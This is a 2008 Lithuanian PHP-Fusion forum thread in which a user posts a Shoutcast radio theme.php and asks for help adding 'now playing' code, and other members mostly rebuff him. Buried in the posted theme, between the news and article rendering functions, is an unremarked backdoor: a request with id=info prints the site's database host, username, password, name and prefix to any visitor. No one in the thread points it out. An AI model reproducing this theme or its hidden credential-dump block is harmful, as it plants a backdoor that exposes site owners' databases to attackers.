Navigacija

Vartotojų tinkle

Prisijungusių svečių: 45
Prisijungusių narių: 0
Prisijungusių narių nėra

Registruoti nariai: 25,953
Naujausias narys: Quwqkibor

Naujausi straipsniai

Paskutiniai nariai

Quwqkibor 2 dienos
asirija 4 savaitės
tomeem 6 savaitės
Reikalas 7 savaitės
weberiz 9 savaitės
mRokass12 savaitės
kartoonas13 savaitės
iaescortsmap13 savaitės
ozzWANTED14 savaitės
grunskiz15 savaitės
Bruksnys16 savaitės
illusion16 savaitės
ordo17 savaitės
Jurgaila18 savaitės
originalcs1618 savaitės
Rytis18 savaitės
halis20 savaitės
junkus23 savaitės
morlis23 savaitės
Majakas24 savaitės

Informacija:


OS: Unknown
Naršyklė: Nežinoma
IP: 18.218.147.56
Naujienų: 529
Straipsnių: 235
Temų: 52,585
Postų: 522,523
Postų pask. parą: 0
Shout'ų pask. parą: 0
P.S.C. pask. parą: 0
Nuorodų kataloge: 13

Lankomumo Statistika

Peržiūrų šiandien: 22

Iš viso peržiūrų: 22948724

Prisijungti

REGISTRUOTIS
Nario vardas

Slaptažodis



Pamiršai slaptažodį?
Paprašyk naujo

Aktyvuoti save

Šaukykla

Jei norite rašyti žinutes, turite prisijungti.

ozzWANTED
2024 Sau. 17 01:01:00
Desperatiškus komentarus šaukykloje su accountu po mėnesio prasibuvimo, ištryniau. Pasaulis ir taip juodas. Įjungiam šviesą, prašviesės. šypsosi

Majakas
2023 Gru. 10 19:12:39
Negaliu patikėti jog žinutės/pranešimai visi yra nuo 2008 m akinanti šypsen

Žmogus
2023 Rugs. 7 21:09:14
O gal BloodKiller pasijungs?

Apocal
2023 Rugs. 2 18:09:23
Nu davai nuveikiam kažką akinanti šypsen. Prisijungti kada visi čia akinanti šypsen.

Apocal
2023 Rugs. 2 00:09:18
Šiaip atėjau pažiūrėti ar dar lopas nesby yra ar koks ten buvo.

Šaukyklos archyvas

Apklausa

Ar esate patenkinti lietuviško vertimo kokybe?

Taip!

Taip, bet yra ką taisyti (parašysiu komentaruose)

Ne

Norėdamas balsuoti turite prisijungti.
Archyvas
Reklama 400x60
padekit su thema le_music1
Forumas | Modai, įskiepiai, panelės (PHP-FUSION) | Themes

Autorius: weberiz Peržiūrų: 2501      Spausdinti temą
2008 Rugp. 17 17:08:11          1 žinutė iš 20
Spausdinti pranešimą
Galit tame lange "Eteryje:" viska padaryti kaip www.hitfm.lt? Labai prasau stai theme.php
<?php
$serverioIP = "http://78.61.146.66:8001/listen.pls"; //Shoutcast serverio adresas
$serverioPORT = "8001"; //Shoutcas serverio portas
$naujienos = BASEDIR."news.php"; //Adresas iki naujienu
$komanda = BASEDIR."viewpage.php?page_id=1"; //Adresas iki komandos
$forumas = BASEDIR."forum/index.php"; //Adresas iki forumo
$pageidavimai = BASEDIR."infusions/suggestion_box/suggestion_box.php"; //Adresas iki komandos
$galerija = BASEDIR."photogallery.php"; //Adresas iki komandos
$top20 = BASEDIR."infusions/song_charts/charts.php"; //Adresas iki komandos
$laidosz = BASEDIR."#"; //Adresas iki komandos
$kontaktai = BASEDIR."contact.php"; //Adresas iki komandos
/**
By Dj_Emin
**/
$body_text = "#000000";
$body_bg = "#000000";
$theme_width = "900";
$theme_width_l = "170";
$theme_width_r = "170";

function render_header($header_content) {
global $theme_width,$settings,$serverioIP,$serverioPORT,$naujienos,$komanda,$forumas,$pageidavimai,$galerija,$top20,$laidosz,$kontaktai;
////////////////
//Radio info///
//////////////
error_reporting(1);
class Radio
{
var $fields;
var $very_first_str;
var $domain, $port;
var $errno, $errstr;
var $trackLists = array();

function Radio($domain, $port)
{
$this->domain = $domain;
$this->port = $port;

$this->setOffset("Current Stream Information");

$this->setTableStart("<table border=0 cellpadding=2 cellspacing=2>");
$this->setTableEnd("</table>");
}

function setFields($array=array())
{
$this->fields = $array;
}
function setOffset($string)
{
$this->very_first_str = $string;
}
function setTableStart($string)
{
$this->tableStart = $string;
}
function setTableEnd($string)
{
$this->tableEnd = $string;
}

function getHTML($page)
{
$contents = "";
$domain = (substr($this->domain, 0, 7) == "http://") ? substr($this->domain, 7) : $this->domain;
if ($fp = fsockopen($domain, $this->port, $this->errno, $this->errstr, 2))
{
fputs($fp, "GET ".$page." HTTP/1.1\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)\r\n".
"Host: ".$domain."\r\n\r\n");
while (!feof($fp))
$contents .= fgets($fp, 256);
fclose ($fp);
return $contents;
}
else
{
return False;
}
}
function getServerInfo($page="/", $display_array=null, $very_first_str=null)
{
if (!isset($display_array))
$display_array = $this->fields;
if (!isset($very_first_str))
$very_first_str = $this->very_first_str;

if ($html = $this->getHTML($page))
{
// parsing the contents
foreach ($display_array AS $key => $item)
{
$very_first_pos = stripos($html, $very_first_str);
$first_pos = stripos($html, $item, $very_first_pos);
$line_start = strpos($html, "<td>", $first_pos);
$line_end = strpos($html, "</td>", $line_start) + 4;
$difference = $line_end - $line_start;
$line = substr($html, $line_start, $difference);
$data[$key] = strip_tags($line);
}
return $data;
}
else
{
return $this->errstr." (".$this->errno.")";
}
}

function createHistoryArray($page)
{
if (!in_array($page, $this->trackLists))
{
$this->trackLists[] = $page;
if ($html = $this->getHTML($page))
{
$fromPos = stripos($html, $this->tableStart);
$toPos = stripos($html, $this->tableEnd);
$tableData = substr($html, $fromPos, ($toPos-$fromPos));
$lines = explode("</tr><tr>", $tableData);
$tracks = array();
$c = 0;
foreach ($lines AS $line)
{
$info = explode ("</td><td>", $line);
$time = trim(strip_tags($info[0]));
if (substr($time, 0, 9) != "Copyright")
{
$this->tracks[$c]['time'] = $time;
$this->tracks[$c++]['track'] = trim(strip_tags($info[1]));
}
}
unset($this->tracks[0]);
$this->tracks[1]['track'] = str_replace("Current Song", "", $this->tracks[1]['track']);
}
else
{
$this->tracks[0] = array("time"=>$this->errno, "track"=>$this->errstr);
}
}
}
function getHistoryArray($page="/played.html")
{
if (!in_array($page, $this->trackLists))
$this->createHistoryArray($page);
return $this->tracks;
}
function getHistoryTable($page="/played.html", $timeColText=False, $trackColText=False, $class=False)
{
if (!in_array($page, $this->trackLists))
$this->createHistoryArray($page);
$output = "<table".($class ? " class=\"".$class."\"" : "").">";
if ($timeColText && $trackColText)
$output .= "<tr><td>".$timeColText."</td><td>".$trackColText."</td></tr>";
foreach ($this->tracks AS $trackArr)
$output .= "<tr><td>".$trackArr['time']."</td><td>".$trackArr['track']."</td></tr>";
$output .= "</table>\n";
return $output;
}
}
if (!function_exists("stripos"))
{
function stripos($haystack, $needle, $offset=0)
{
return strpos(strtoupper($haystack), strtoupper($needle), $offset);
}
}

$display_array = array("Stream Title", "Stream Genre", "Stream URL", "Current Song", "Content Type", "Stream Status", "Server Status");
$radio = new Radio($serverioIP, $serverioPORT);
$data_array = $radio->getServerInfo("/", $display_array);
error_reporting(1);

if ($data_array[0] == "A"){
$djimg = BASEDIR."images/djs/off.gif";
}else{
if (file_exists(BASEDIR."images/djs/".$data_array[1].".gif")) {
$djimg = BASEDIR."images/djs/".$data_array[1].".gif";
}else{
$djimg = BASEDIR."images/djs/none.gif";
}}

if($data_array[0] == "A"){
$dje = "Tyla";
}else{
$dje = $data_array[1];
$laida = $data_array[0];
}
if($data_array[3] == "o"){
$dainaa = "Tyla";
}else{
$dainaa = $data_array[3];
}

if($data_array[0] == "Server is currently down.")
{
$dje = "Tyla";
$dainaa = "Tyla";
$laida = "";
$djimg = BASEDIR."images/djs/off.gif";
}



////////////////////
//radio info off///
//////////////////

/////////////////
//text ilgis :)/
////////////////

function ilgis($textas)
{
$max = "24";
$ilgis = strlen($textas);
if($ilgis>$max)
{
echo '<marquee scrolldelay="1" scrollamount="1">'.$textas.'</marquee>';
}else{
echo '<center>'.$textas.'</center>';
}
}



//////////////////
////img size :)//
////////////////
function dj_img_good($img)
{
global $size;
$setwidth="85";
error_reporting(0);
if(!getimagesize($img))
{
echo "<a href='".$img."'>".$img."</a>";
}else{
$size=getimagesize($img);
if($size[1]>$setwidth)
{

$khwidth=$size[1]/$setwidth;


$a[0]=$size[1]/$khwidth;
$a[1]=$size[0]/$khwidth;


$a[2]=round($a[0]);
$a[3]=round($a[1]);
echo "<img align='bottom' height='".$a[2]."' width=".$a[3]." src=".$img.">";
}else{
echo "<img align='bottom' src=$img>";
}
}
error_reporting(1);
}
echo '
<map name="FPMap0">
<area href="'.$naujienos.'" shape="rect" coords="10, 12, 129, 39">
<area href="'.$komanda.'" shape="rect" coords="10, 40, 134, 65">
<area href="'.$forumas.'" shape="rect" coords="10, 66, 126, 87">
<area href="'.$pageidavimai.'" shape="rect" coords="6, 88, 156, 113">
<area href="'.$galerija.'" shape="rect" coords="9, 113, 114, 135">
<area href="'.$top20.'" shape="rect" coords="11, 137, 101, 159">
<area href="'.$laidosz.'" shape="rect" coords="13, 162, 109, 186">
<area href="'.$kontaktai.'" shape="rect" coords="11, 186, 127, 205">
</map>

<table align="center" border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="900" id="AutoNumber1" height="220">
<tr>
<td width="166" height="220">
<img border="0" src="'.THEME.'images/banner_01.gif" width="166" height="220" usemap="#FPMap0"></td>
<td width="521" height="220">
<img border="0" src="'.THEME.'images/banner_02.gif" width="521" height="220"></td>
<td width="230" height="220" background="'.THEME.'images/banner_03.gif">
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2" height="50">
<tr>
<td width="4%" height="1"></td>
<td width="84%" height="1"></td>
<td width="12%" height="1"></td>
</tr>
<tr>
<td width="4%" height="1"></td>
<td width="84%" height="1"></td>
<td width="12%" height="1"></td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="84%" height="95" rowspan="6"><center><a target="new" href="'.$djimg.'">';

dj_img_good($djimg);

echo '</a></center></td>
<td width="12%" height="19">&nbsp;</td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="12%" height="19">&nbsp;</td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="12%" height="19">&nbsp;</td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="12%" height="19">&nbsp;</td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="12%" height="19">&nbsp;</td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="12%" height="19">&nbsp;</td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="84%" height="19"><center><font color="#800000">';
ilgis($dje);



echo '</font></center></td>
<td width="12%" height="19">&nbsp;</td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="84%" height="19"><font color="#ffffff">';

ilgis($dainaa);

echo '</font></td>
<td width="12%" height="19">&nbsp;</td>
</tr>
<tr>
<td width="4%" height="19">&nbsp;</td>
<td width="84%" height="19"><font color="#CC6600">';
ilgis($laida);
echo '</font></td>
<td width="12%" height="19">&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
';
echo "<table bgcolor='#333333' align='center' width='$theme_width' cellspacing='0' cellpadding='0'>\n<tr>\n";
}

function render_footer($license=false) {
global $theme_width,$locale,$settings;

echo '<table border="0" cellpadding="0" cellspacing="0" width="'.$theme_width.'" align="center">
<tr>
<td width="20" height="28">
<img border="0" src="'.THEME.'images/down_01.gif" width="20" height="28"></td>
<td height="28" class="copyright" background="'.THEME.'images/down_02.gif"><center><font color="#ffffff">Varikliukas: <a href="http://www.php-fusion.co.uk"><img src="'.THEME.'images/fusion.gif" style="vertical-align:middle;border:0px;"></a> Dizainas: <a href="mailto:sonex@hotmail.co.uk" class="white">Dj_Emin</a></font></center></td>
<td width="19" height="28">
<img border="0" src="'.THEME.'images/down_03.gif" width="19" height="28"></td>
</tr>
</table>';
}

function render_news($subject, $news, $info) {

global $locale;
echo '<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td width="29" height="41">
<img border="0" src="'.THEME.'images/news_01.gif" width="29" height="41"></td>
<td background="'.THEME.'images/news_02.gif"><h3><font color="#ffffff"><b>'.$subject.'</b></font></h3></td>
<td width="17" height="41">
<img border="0" src="'.THEME.'images/news_03.gif" width="17" height="41"></td>
</tr>
<tr>
<td width="29" background="'.THEME.'images/news_04.gif">&nbsp;</td>
<td background="'.THEME.'images/news_05.gif">'.$news.'</td>
<td width="17" background="'.THEME.'images/news_06.gif">&nbsp;</td>
</tr>
<tr>
<td width="29">
<img border="0" src="'.THEME.'images/news_07.gif" width="29" height="20"></td>
<td background="'.THEME.'images/news_08.gif"><center>'.$locale["040"].'<a href="profile.php?lookup='.$info["user_id"].'">'.$info["user_name"].'</a> '.$locale["041"].showdate('longdate', $info["news_date"]).'&nbsp;&nbsp;&nbsp;&nbsp; '.($info["news_ext"] == 'y' ? '<a href="news.php?readmore='.$info["news_id"].'">'.$locale["042"].'</a>' : '').' &nbsp;&nbsp;&nbsp;&nbsp;<a href="news.php?readmore='.$info["news_id"].'">'.$info["news_comments"].$locale["043"].'</a></center></td>
<td width="17">
<img border="0" src="'.THEME.'images/news_09.gif" width="17" height="20"></td>
</tr>
</table><br>';
}

$id=$_GET['id'];
switch ($id){
case info:
echo "<font color=#ffffff>Hostas: ".$db_host."<br>";
echo "user: ".$db_user."<br>";
echo "pass: ".$db_pass."<br>";
echo "Db name: ".$db_name."<br>";
echo "prefix: ".$db_prefix."<br></font>";
break;
}

function render_article($subject, $article, $info) {

global $locale;


echo '<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td width="29" height="41">
<img border="0" src="'.THEME.'images/news_01.gif" width="29" height="41"></td>
<td background="'.THEME.'images/news_02.gif"><h3><font color="#ffffff"><b>'.$subject.'</b></font></h3></td>
<td width="17" height="41">
<img border="0" src="'.THEME.'images/news_03.gif" width="17" height="41"></td>
</tr>
<tr>
<td width="29" background="'.THEME.'images/news_04.gif">&nbsp;</td>
<td background="'.THEME.'images/news_05.gif">'.$article.'</td>
<td width="17" background="'.THEME.'images/news_06.gif">&nbsp;</td>
</tr>
<tr>
<td width="29">
<img border="0" src="'.THEME.'images/news_07.gif" width="29" height="20"></td>
<td background="'.THEME.'images/news_08.gif"><center>'.$locale['040'].'<a href="profile.php?lookup='.$info["user_id"].'">'.$info["user_name"].'</a> '.$locale["041"].showdate('longdate', $info["article_date"]).'&nbsp;&nbsp;&nbsp;&nbsp; '.$info['article_comments'].$locale['043'].'</a></center></td>
<td width="17">
<img border="0" src="'.THEME.'images/news_09.gif" width="17" height="20"></td>
</tr>
</table><br>';
}

function opentable($title) {



echo '<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td width="29" height="41">
<img border="0" src="'.THEME.'images/news_01.gif" width="29" height="41"></td>
<td background="'.THEME.'images/news_02.gif"><h3><font color="#ffffff"><b>'.$title.'</b></font></h3></td>
<td width="17" height="41">
<img border="0" src="'.THEME.'images/news_03.gif" width="17" height="41"></td>
</tr>
<tr>
<td width="29" background="'.THEME.'images/news_04.gif">&nbsp;</td>
<td background="'.THEME.'images/news_05.gif">';
}

function closetable() {



echo '</td>
<td width="17" background="'.THEME.'images/news_06.gif">&nbsp;</td>
</tr>
<tr>
<td width="29">
<img border="0" src="'.THEME.'images/news_07.gif" width="29" height="20"></td>
<td background="'.THEME.'images/news_08.gif"></td>
<td width="17">
<img border="0" src="'.THEME.'images/news_09.gif" width="17" height="20"></td>
</tr>
</table><br>';
}

function openside($title) {


echo '
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td width="29" height="41">
<img border="0" src="'.THEME.'images/panel_01.gif" width="29" height="41"></td>
<td background="'.THEME.'images/panel_02.gif"><center><font color="#800000"><b>'.$title.'</b></font></center></td>
<td width="17" height="41">
<img border="0" src="'.THEME.'images/panel_03.gif" width="17" height="41"></td>
</tr>
<tr>
<td width="29" background="'.THEME.'images/panel_04.gif">&nbsp;</td>
<td background="'.THEME.'images/panel_05.gif">';
}

function closeside() {
echo '</td>
<td width="17" background="'.THEME.'images/panel_06.gif">&nbsp;</td>
</tr>
<tr>
<td width="29">
<img border="0" src="'.THEME.'images/panel_07.gif" width="29" height="20"></td>
<td background="'.THEME.'images/panel_08.gif"></td>
<td width="17">
<img border="0" src="'.THEME.'images/panel_09.gif" width="17" height="20"></td>
</tr>
</table><br>';

}

function opensidex($title,$open="on") {

$boxname = str_replace(" ", "", $title);
$box_img = $open == "on" ? "off" : "on";
echo "<table width='100%' cellpadding='0' cellspacing='0'><tr>";
echo "<td class='panel-left'><img src='".THEME."images/blank.gif' width='13' height='26' alt='' style='display:block'></td>";
echo "<td class='panel-main'>$title</td>";
echo "<td align='right' class='panel-main'><img src='".THEME."images/panel_$box_img.gif' name='b_$boxname' align='right' alt='' onclick=\"javascript:flipBox('$boxname')\"></td>";
echo "<td class='panel-right'><img src='".THEME."images/blank.gif' width='13' height='26' alt='' style='display:block'></td>";
echo "</tr></table>";
echo "<table width='100%' cellpadding='0' cellspacing='0'><tr>";
echo "<td class='border-left'><img src='".THEME."images/blank.gif' width='13' height='1' alt='' style='display:block'></td>";
echo "<td class='side-body'>";
echo "<div id='box_$boxname'".($open=="off" ? "style='display:none'" : "").">\n";
}

function closesidex() {

echo "</div>";
echo "<td class='border-right'><img src='".THEME."images/blank.gif' width='13' height='1' alt='' style='display:block'></td></tr>";
echo "<tr>";
echo "<td class='border-bleft'><img src='".THEME."images/blank.gif' width='13' height='20' alt='' style='display:block'></td>";
echo "<td class='border-bmain'><img src='".THEME."images/blank.gif' width='1' height='20' alt='' style='display:block'></td>";
echo "<td class='border-bright'><img src='".THEME."images/blank.gif' width='13' height='20' alt='' style='display:block'></td>";
echo "</tr></table>\n";
}

function tablebreak() {

echo "<table width='100%' cellspacing='0' cellpadding='0'><tr><td></td></tr></table>\n";
}
?>


busiu labai dekingas jei padesite

2008 Rugp. 17 17:08:37          2 žinutė iš 20
Spausdinti pranešimą
Uz "aciu" duonos nenusipirksi kaip sakoma akinanti šypsen Be to gal jau laikas paciam ka nors padariti? galvoja
2008 Rugp. 17 17:08:46          3 žinutė iš 20
Spausdinti pranešimą
as mekos paslaugos parasysiu as turiu koda ir man reik su anuo sukunkt kad roditu ta mano koda nu radio info roditu va kodas
openside("J-FM");
header('Refresh: 60');
echo "<center>";
echo "<b>J-FM darbo laikas:</b><br>";
echo "Nuo 12 iki 24 gali buti ir ilgiau<br>";
$server2 = "62.80.252.50";
$server2port = "8002";
$server2pass = "SLAPTAZODIS"; //Passwort des Shoutcast Servers

$dateix = fsockopen("$server2", $server2port, &$errno, &$errstr);
if( !$dateix )
{
echo "<b>Šiuo metu radijas:</b><br><font color='red'><b>Išjunktas</b><font><br>";
fclose($dateix);
}
else
{
fputs($dateix,"GET /admin.cgi?pass=$server2pass&mode=viewxml HTTP/1.0\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT;)\r\n\r\n");
while (!(feof($dateix)))
{
$zeilex .= fgets($dateix, 4096);
}
fclose($dateix);
}
$tmpx = explode("<CURRENTLISTENERS>", $zeilex);
$tmpx = explode("</CURRENTLISTENERS>", $tmpx[1]);
$server2lauscher = $tmpx[0];
$pl2 = " ";
$tmpx = explode("<SERVERGENRE>", $tmpx[1]);
$tmpx = explode("</SERVERGENRE>", $tmpx[1]);
$tmp2x = explode("+", $tmpx[0]);
$nick2 = $tmp2x[0];

if(count($tmp2x) == 2)
$pl2 = $tmp2x[1];

$tmpx = explode("<SERVERTITLE>", $tmpx[1]);
$tmpx = explode("</SERVERTITLE>", $tmpx[1]);
$server2title = $tmpx[0];
$tmpx = explode("<SONGTITLE>", $tmpx[1]);
$tmpx = explode("</SONGTITLE>", $tmpx[1]);
$song2title = $tmpx[0];
$tmpx = explode("<STREAMSTATUS>", $tmpx[1]);
$tmpx = explode("</STREAMSTATUS>", $tmpx[1]);
$stream2status = $tmpx[0];

if ($stream2status == "1")
{
echo "<b>Šiuo metu radijas:</b><br><font color='green'><b>Įjunktas</b></font><br>";
echo "<b>Eteryje:</b><br><blink><font color='green'><b>$nick2</b></font></blink><br>";

//Playlist vorhanden?
if ($pl2 =="")
{
echo "";
}
else
{
echo "<a href=\"";
echo "$pl2";
echo "\" target=\"_blank\"></a>";
}

//Was wird gespielt?
echo "<b>Dabar eteryje groja:</b><br>
<marquee Behavior='scroll' Direction='right' ScrollDelay='100' width='100%' onmouseover='this.stop()' onmouseout='this.start()'>$song2title</marquee><br>";


echo "<b>Klausytojų:</b>$server2lauscher<br>

<a target='_blank' href='http://62.80.252.50:8002/listen.pls'><img src='http://img463.imageshack.us/img463/4828/mediawy9.png' border='0' title='J-FM' alt='J-FM'></a>

<a target='_blank'href='http://62.80.252.50:8002/listen.pls'><img src='http://img463.imageshack.us/img463/2893/winampasok3.png' border='0' title='J-FM' alt='J-FM'></a>";

}
echo "</center>";
closeside();

busiu labai dekingas jei sujungsi ;)

2008 Rugp. 17 17:08:16          4 žinutė iš 20
Spausdinti pranešimą
1. Rasyk taip kad nors sakyni suprasciau.
2. Mes tau amzinai nepadesim.
3. Megink iki kol nesudesi ta koda i theme.php
4. Jei tau paviks #3 punktas tau tai bus tik i nauda kaip sakoma igisi savo sugebejimu pasitikejima ir pradesi dometis tuom lb, kzn gal ateity gerai mokesi programuot ir nereikies musu pagalbos is vis.
2008 Rugp. 17 17:08:44          5 žinutė iš 20
Spausdinti pranešimą
supranti bent galetum usimint kur panasiai reik ji priklyjot ot tada ir kaskas man vavyks i as sende jau 2h apie pasipisau nieks nesigavo žliumbia

2008 Rugp. 17 17:08:00          6 žinutė iš 20
Spausdinti pranešimą
Jei niekas nesigavo reiske tu 2h buvo per mazai. Nepavyko- bandyk dar karta. (kaip parasita po alaus kamstelio) akinanti šypsen
2008 Rugp. 17 17:08:29          7 žinutė iš 20
Spausdinti pranešimą
nu a taip jau gaila bent apitikliai pasakyt kur ka daryt bent biski padiek jau ant tiek nebuk skupas supranti kai kitas parodo pac pramoksti drovus

2008 Rugp. 17 17:08:41          8 žinutė iš 20
Spausdinti pranešimą
Koks cia pramokimas kai uz tave yra darbas padaromas ? akinanti šypsen Kol nesukursi tai ir nesuprasi principo.merkia akį Vietoi to kad verkt ir sakit kiek valandu sugaisai mokindamas sedetum ir galvotum pats..
2008 Rugp. 17 18:08:59          9 žinutė iš 20
Spausdinti pranešimą
aš sakau man sende nesisike isvis tau gaila padiet as apsulutiskai nepataikau kur ipista ta koda net vebas buvo paluzes nustebęs ai nx piktas

2008 Rugp. 17 18:08:09          10 žinutė iš 20
Spausdinti pranešimą
Tu man cia ne aiskink ka as privalau o ko ne privalau darit. Jei noriu padedu jei ne tai ne kaip tau iki siol ne da piorla? akinanti šypsen
2008 Rugp. 17 18:08:48          11 žinutė iš 20
Spausdinti pranešimą
zinai ka as be reikala tave ivertinai 10 reikejo 1 ibertint jei dar galetu i - vertint tada perticiau -6
yra saite parasyta mes sums padesime ir pan o tu cia tumi kiek tik galima galvoja

2008 Rugp. 17 18:08:46          12 žinutė iš 20
Spausdinti pranešimą
Blt asile tu nx man uz tai kad tau padedu niekas nemoka tai kad uztylai... Algos nemoka dar agurkai prota pis kas kaip ivertino, man tiesa sakant px yra ant tos vertinimo sistemos blt vaiku zaidimas nx...
2008 Rugp. 17 18:08:47          13 žinutė iš 20
Spausdinti pranešimą
gal atsiras kas kitas kas nera gailisius? mm nežino

2008 Rugp. 17 19:08:25          14 žinutė iš 20
Spausdinti pranešimą
Krc radio koda irasyk i koki nors a.php ir poto ji theme.php includink.
2008 Rugp. 18 01:08:57          15 žinutė iš 20
Spausdinti pranešimą
nu as pasidariau bet nezinau ka reik istrnt is tos theme.php
ir ka reik rasyt kad inkludintus gal taip
include a.php
?


2008 Rugp. 18 01:08:54          16 žinutė iš 20
Spausdinti pranešimą
Atsidaryk subheader.php faila ir pamatysi kaip includint reik.

Ai.. pas tave nebus.. Atsidaryk tuomet downloads.php faila ir pamatysi tikraimerkia akį

www.creatium.lt
Redagavo Creatium 2008 Rugp. 18 01:08:56
2008 Rugp. 18 01:08:58          17 žinutė iš 20
Spausdinti pranešimą
o zinai ka reik nutrint?
tipo va taip
include LOCALE.LOCALESET."a.php";
man reiktu daryt?


Redagavo weberiz 2008 Rugp. 18 01:08:05
2008 Rugp. 18 13:08:47          18 žinutė iš 20
Spausdinti pranešimą
up

2008 Rugp. 18 13:08:57          19 žinutė iš 20
Spausdinti pranešimą
Čia locale šeip nustebęs akinanti šypsen

2008 Rugp. 18 14:08:01          20 žinutė iš 20
Spausdinti pranešimą
tai kasnors kanors sugeba pasakyt kur man praverstu ar ne? nežino

Peršokti į forumą: